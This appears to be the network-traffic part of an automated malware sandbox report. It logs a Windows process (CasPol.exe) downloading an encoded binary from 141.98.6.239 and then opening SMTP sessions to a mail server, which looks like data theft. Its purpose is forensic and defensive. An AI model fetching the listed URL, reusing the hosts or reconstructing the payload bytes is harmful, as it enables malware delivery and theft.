Aug 8, 2022 13:30:13.570863962 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570919991 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570943117 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571024895 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571125031 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571127892 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571187019 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571203947 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571265936 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571286917 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571335077 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571384907 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571403027 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571449995 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571490049 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571505070 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571559906 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571572065 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571623087 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571671963 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571717978 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571764946 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571787119 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571827888 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571857929 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571888924 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.571930885 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.571944952 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572000027 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572029114 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572058916 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572108984 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572154999 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572201014 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572202921 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572262049 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572273016 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572320938 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572329044 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572385073 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572416067 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572441101 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572479010 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572496891 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572551012 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572597980 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572642088 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572645903 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572704077 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572731972 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572745085 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.572779894 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.572858095 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.573781013 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.573834896 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.573967934 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574019909 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574083090 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574116945 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574186087 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574228048 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574244976 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574342012 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574388981 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574445009 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574460030 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574517012 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574605942 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574623108 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574695110 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574743032 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574784040 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574794054 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574841022 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574857950 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574914932 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.574932098 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.574984074 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575026035 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575057983 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575112104 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575144053 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575165987 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575191975 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575231075 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575279951 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575284958 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575341940 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575351954 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575404882 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575453043 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575476885 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575512886 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575525045 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575578928 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.575603008 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575675011 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.575802088 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595017910 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595192909 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595202923 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595364094 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595387936 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595510960 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595518112 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595640898 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595665932 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595710039 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595767021 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595834970 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595854998 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595905066 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.595921040 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595949888 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.595977068 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596036911 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596049070 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596101046 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596151114 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596152067 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596199036 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596213102 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596266985 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596271038 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596338034 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596364975 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596400976 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596455097 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596501112 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596503019 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596561909 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596609116 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596662998 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596663952 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596714973 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596726894 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596797943 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596812010 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.596864939 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596915007 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.596960068 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597001076 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597012043 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597014904 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597073078 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597120047 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597166061 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597220898 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597232103 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597234964 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597300053 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597315073 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597337961 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597374916 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597431898 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597460985 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597492933 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597512007 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597559929 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597600937 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.597702980 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.597752094 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:24.417429924 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:24.535268068 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:24.535497904 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:24.723265886 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:24.723635912 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:24.847345114 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:24.847774029 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:24.973896980 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.022278070 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.049010992 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.193759918 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.193836927 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.193892002 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.193929911 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.194008112 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.194061041 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.198251963 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.200474024 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.311923027 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.366019011 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.500152111 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.620965004 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.622903109 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.733578920 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.734220028 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.847384930 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.848804951 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:25.959038973 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:25.959487915 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.256479025 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.366122961 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.434366941 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.434782982 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.544560909 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.544610977 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.558662891 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.558693886 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.558717966 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.558784962 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:26.668802023 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.668915033 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.668956995 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:26.668994904 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:31.220776081 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:31.270893097 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:33.539383888 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:33.689703941 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:33.980900049 CEST	587	49796	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:33.985735893 CEST	49796	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:33.987236023 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.096883059 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.097126007 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.274610043 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.275027037 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.385174990 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.385531902 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.496872902 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.497580051 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.613151073 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.613235950 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.613296986 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.613342047 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.613449097 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.613511086 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.614737988 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.616295099 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.726613045 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.727612019 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.837651014 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.838013887 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:34.948286057 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:34.948803902 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.061976910 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.062355995 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.172359943 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.172725916 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.322868109 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.326308966 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.326631069 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.436172962 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.436268091 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.437614918 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.437699080 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.437784910 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.437856913 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.438224077 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.438255072 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.438297987 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.548830986 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.548923969 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.548943043 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.548960924 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.548976898 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.548995972 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.549011946 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.549030066 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.549082041 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.549253941 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.549431086 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:30:35.658607960 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.658653021 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.658709049 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.659488916 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:35.659569025 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:42.131805897 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:30:42.174938917 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:32:03.407073975 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:32:03.426404953 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:32:03.426548004 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:32:03.516607046 CEST	49797	587	192.168.11.20	69.61.116.42
Aug 8, 2022 13:32:03.781115055 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:32:04.053133011 CEST	587	49797	69.61.116.42	192.168.11.20
Aug 8, 2022 13:32:04.053857088 CEST	49797	587	192.168.11.20	69.61.116.42

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 13:30:23.502373934 CEST	55033	53	192.168.11.20	1.1.1.1
Aug 8, 2022 13:30:24.407882929 CEST	53	55033	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 8, 2022 13:30:23.502373934 CEST	192.168.11.20	1.1.1.1	0x87d9	Standard query (0)	mail.merian.com.ar	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 8, 2022 13:30:24.407882929 CEST	1.1.1.1	192.168.11.20	0x87d9	No error (0)	mail.merian.com.ar	merian.com.ar		CNAME (Canonical name)	IN (0x0001)
Aug 8, 2022 13:30:24.407882929 CEST	1.1.1.1	192.168.11.20	0x87d9	No error (0)	merian.com.ar		69.61.116.42	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

141.98.6.239

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49793	141.98.6.239	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2022 13:30:13.467061996 CEST	9013	OUT	GET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 141.98.6.239 Cache-Control: no-cache
Aug 8, 2022 13:30:13.487915039 CEST	9014	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 08 Aug 2022 04:51:52 GMT Accept-Ranges: bytes ETag: "4961fc93e2aad81:0" Server: Microsoft-IIS/8.5 Date: Mon, 08 Aug 2022 11:30:13 GMT Content-Length: 214592 Data Raw: ac 0f 7e 5b b5 c8 d1 9a c4 19 3d f2 64 06 8c 95 68 98 1a 05 df cc ce bc 94 17 e5 0d 00 77 6f 89 f7 4b 4c 9b c3 cc 5f 7e 32 b8 80 d7 5c d7 8f b2 aa 48 45 da 7b 6a 29 2a cf 1e 47 43 a3 ea ff f2 18 bd 6a fd a4 bf c7 f6 d2 e5 51 1a 9f e2 c9 09 f8 41 e4 dc 42 17 99 c7 c1 27 9c fd a1 c8 bd 33 d4 9c be f6 04 c7 81 d3 f8 f7 44 11 03 19 a7 ae 4e 19 b2 a5 0c 53 46 6a 4c a0 a4 36 81 29 19 01 c7 ac de 46 95 cb 79 aa 87 a9 d7 1a 1e a2 7b 05 a4 1f d7 f9 a8 c0 b9 a0 3e db b5 ff 41 d7 6e dd 07 90 5d d3 a0 bc 78 5d 28 62 2c f9 fa 6e 6b 46 35 78 fc 16 83 f0 a9 97 78 a1 7f 8f 63 a9 c8 d6 ca a3 6d cd 18 d1 44 a8 8f 20 d5 07 51 e7 fb fe f7 ee 96 3a c0 25 7b 29 cc d2 85 d5 9e b9 16 99 a2 df cb 95 5b 79 ba 93 72 e0 18 b1 19 0f b6 08 54 d6 e2 bc 15 1c 74 07 05 20 d4 a2 0c f7 4c b9 22 79 80 30 14 95 a2 6f a4 87 97 07 be 94 12 b6 be 5f 54 19 44 d4 de b8 4c 7f 38 48 a3 00 d6 c1 6a 29 b9 c4 c0 eb a2 5c 46 1e 9a 5e 6e 10 60 63 f9 62 08 fe 88 4c ab 8f 01 aa 96 aa 94 54 2c 76 08 e9 25 0e b9 00 35 58 2e f2 f9 29 ae a7 21 d6 5f 32 75 31 6d b9 be 4e 48 82 13 fa 06 e8 af f6 bc 2a 62 e6 0e 32 ff 78 b7 06 11 d1 71 18 95 62 d3 52 42 69 12 81 69 f6 e6 33 4d 31 7b a5 3b 6a 9d a1 17 04 65 1d a3 d2 0d f5 5a b7 6d 26 c5 61 30 a5 cb 9c d8 e5 b7 a6 38 8d a4 0b 0c 0a c4 75 ef 82 02 f8 3e 57 2e d7 14 20 c5 de ca 77 8f d6 48 73 92 c2 64 38 f4 be aa 7f a8 03 8e ad 72 62 71 8c d7 77 5f 90 ec be 78 2e 2c bf 75 2d f6 bd 7d b5 2b 19 37 19 69 e4 17 6e 94 25 0d 8a 62 2d 1a 04 8a 9c 03 db 8b 94 17 79 f4 1b e9 30 47 e6 97 ff 79 0b 32 4a 5f ef 80 37 29 80 40 0f 9b a9 a9 74 94 da b5 6d a3 ad 7f 7e 0b 05 db 17 52 29 5f 8a e0 44 87 4c f0 2b a1 c8 3d 10 8d f2 10 92 e7 7e 86 00 a9 46 d6 2c dd 27 b3 f3 27 34 cd 2b 5c ea c8 c2 bb 22 b0 6a c4 ea 44 58 32 78 92 76 ec 10 90 3f d5 03 ab 53 52 8f 21 fa 3c 57 e9 a5 27 f1 42 ad 3e 9c e9 2b 27 2f 43 3e 41 cd 3c 39 9d a4 03 35 bd d8 7d 79 c1 73 fc 41 b5 c2 22 df 2b ee f1 93 76 cd e1 92 1d 2c d7 08 e7 61 95 fe 1c 1f a6 23 56 97 e5 af 0f c9 2a a4 5f 2f 06 b0 1a fd 2b 34 d9 0f f6 8b 2d e7 70 73 1d 59 66 48 ee ee 39 49 91 78 5f 9a de d6 9c 28 d8 5c 7d ae 7c ae 85 